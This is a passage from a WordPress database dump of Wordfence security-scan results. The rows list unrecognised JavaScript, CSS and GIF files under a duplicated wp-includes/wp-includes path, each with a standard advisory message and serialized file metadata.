tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/heartbeat.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77642,1675048841,1675048841,'new','knownfile',75,'882e13372a2fec5cd82d74b1b0c80f51','cf9ff405a30aaf71df57af537930f470','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverIntent.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/hoverIntent.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77643,1675048841,1675048841,'new','knownfile',75,'a9ed7c2f2e6780cd62d973f8a63dabfe','4360db953d64afb25fa92ad85377d058','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverIntent.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/hoverIntent.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77644,1675048841,1675048841,'new','knownfile',75,'ed8d97f1bc587718587ac3791a03379e','0501082d298e4392cd5bc5b6c32ea448','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverintent-js.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/hoverintent-js.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77645,1675048841,1675048841,'new','knownfile',75,'df499be546f660735ec872717dd3e17a','ae5e86fe31065d85d1fcf809e228c900','Unknown file in WordPress core: wp-includes/wp-includes/js/imagesloaded.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/imagesloaded.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77646,1675048841,1675048841,'new','knownfile',75,'494db04a1a9fca113a5efd80afb71bae','61bad81d5a0623c8747d7773e3982a6d','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77647,1675048841,1675048841,'new','knownfile',75,'9e40fc0462988db8e12d9449a923d504','e728b3d05eb8b39a996d99739330c4f2','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77648,1675048841,1675048841,'new','knownfile',75,'8e4c5ca030e7f91ad6578d51f7e6eee4','f1741edb21b8385cfe12dfab6abf8d86','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/imgareaselect.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/imgareaselect.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77649,1675048841,1675048841,'new','knownfile',75,'3ead021a7a654c5ce41ce6927280ef42','d433107c926764f4ea1ca789e0aaeec6','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77650,1675048841,1675048841,'new','knownfile',75,'b19f9c1c02009dafce41810361bea02d','a378d14dfd76fca05a7482b15f3a9b20','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77651,1675048841,1675048841,'new','knownfile',75,'47845394fd97baca9c4fca42ad1b3fc6','a2aafc04ee6f1e4246f4484ef86cd7de','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/Jcrop.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/jcrop/Jcrop.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77652,1675048841,1675048841,'new','knownfile',75,'0338735e5d8becf92034629443014bb4','03f2f6573707a1b564f3eda4d312692a','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77653,1675048841,1675048841,'new','knownfile',75,'5e36b771360e7df1fb83a04b08b3ebf5','d69de372a7320fb630118aee82131017','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77654,1675048841,1675048841,'new','knownfile',75,'8c97c2e2e4a326b56f29147b78046ee5','b6159f800c36ce90c9fccc44742dab55','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery-migrate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/jquery-migrate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77655,1675048841,1675048841,'new','knownfile',75,'e5de5514e2fcb6db9e732f153eb48de7','ec77fec0d866bfb4b8b18422772c5a9f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery-migrate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery-migrate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77656,1675048842,1675048842,'new','knownfile',75,'a28c7118b1c5279c1662f73dcf67bc80','54df4103a7d5fcc05595d9912cec7793','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.color.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/jquery.color.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77657,1675048843,1675048843,'new','knownfile',75,'21abe5e52c1cd3f1a8af065dd909f403','7e07c12f46614e6658252971e01b8a28','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.form.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/jquery.form.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77658,1675048843,1675048843,'new','knownfile',75,'804de3aae700746fe1ec67c7d91e4882','ba7a6aab719472f3421dd221be6308a1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.form.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/jquery.form.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77659,1675048843,1675048843,'new','knownfile',75,'6466860b1bb05e8fd9bf3ba0e79a24db','c6d637adefc9301feda1e07f8746481b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.hotkeys.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/jquery.hotkeys.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77660,1675048843,1675048843,'new','knownfile',75,'83834c9d1b451e34795ad05d3b4113b8','d8202dce7483ffe54185b82c9db077f9','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77661,1675048843,1675048843,'new','knownfile',75,'75df260005b15f77e83e1f2bc98085fb','e09904360147f4c0e5779244772c91fd','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/jquery/jquery.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77662,1675048843,1675048843,'new','knownfile',75,'72a9926e32447d482f16de68bd0fb363','e573f6df66e80e0a016725305979f8b2','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.masonry.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery.masonry.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77663,1675048843,1675048843,'new','knownfile',75,'cbbf56cf14d6226d356bb3772c0797ec','5a41d56f531e936c198b4a8e150a56a6','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/jquery.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77664,1675048843,1675048843,'new','knownfile',75,'1ae87eeaaaaf2c6d55b638cf1e060cfe','f2843a01757bbedb5915da148e1ecad5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.query.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/jquery.query.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77665,1675048843,1675048843,'new','knownfile',75,'f7446322df273affaca00faa3c8b5677','545186c3bc2475250a4f6d16c9977397','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.schedule.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/jquery.schedule.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77666,1675048843,1675048843,'new','knownfile',75,'e06f4c246cd027946309a490d5c1d553','11e860894c169e9b213148817fafa61c','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.serialize-object.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/jquery/jquery.serialize-object.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77667,1675048843,1675048843,'new','knownfile',75,'dbd8c9aa2856973cb84b167638f637b5','bd401c1496c60a1857254a1b29b9efa4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77668,1675048843,1675048843,'new','knownfile',75,'1550f6ed4af0fee36a23193e89ac7fa1','0740e1da5ccef1d0c2fc3b51e5ba2f92','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77669,1675048844,1675048844,'new','knownfile',75,'0dfdf6b050ccc30e7cf14807bfd6de9b','56dfc0c07c9e61f9c4123c661fd4700e','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77670,1675048844,1675048844,'new','knownfile',75,'ed1496288d7d9b0212e8920610afc2af','9089ea86c0333513b5e746cbac25c173','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/suggest.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/jquery/suggest.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77671,1675048844,1675048844,'new','knownfile',75,'ec2db57b1d23f60f960e0e5e870f724f','fb779578816bc3af82b58f8397449292','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/suggest.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/suggest.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77672,1675048844,1675048844,'new','knownfile',75,'9df65606190b4ad69d55925482cd9d50','837069c3c91f47003c358234e58b2d55','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/accordion.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/ui/accordion.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77673,1675048844,1675048844,'new','knownfile',75,'4a76c53c2862392d885fcc49cad5fb54','0c1423bfcd1567d5cecdf973dd4fb041','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/accordion.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/ui/accordion.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77674,1675048844,1675048844,'new','knownfile',75,'dc316159c8b502e20963b95327d676e9','72b63bb26009516e7cd2fadc45ccf098','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/autocomplete.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/ui/autocomplete.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77675,1675048844,1675048844,'new','knownfile',75,'81e57f425c08fa419201e5a564ca26df','ecef63e38f2436b6cc159e743d5e589d','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77676,1675048844,1675048844,'new','knownfile',75,'a36e1763140b2f9d2a2bb986768a9ab3','086775fc2e7cbeaa279e822b13c94b1c','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/button.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/jquery/ui/button.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77677,1675048844,1675048844,'new','knownfile',75,'8ec810903bdaaf841ea13783250d4502','91c66865117c09f56b3621f56ec81d80','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/button.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/jquery/ui/button.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77678,1675048844,1675048844,'new','knownfile',75,'650c52abc5066d8b15547b1af58563e9','46b01e0c51f1a2326dbb59aeb1cf82d3','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/ui/checkboxradio.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 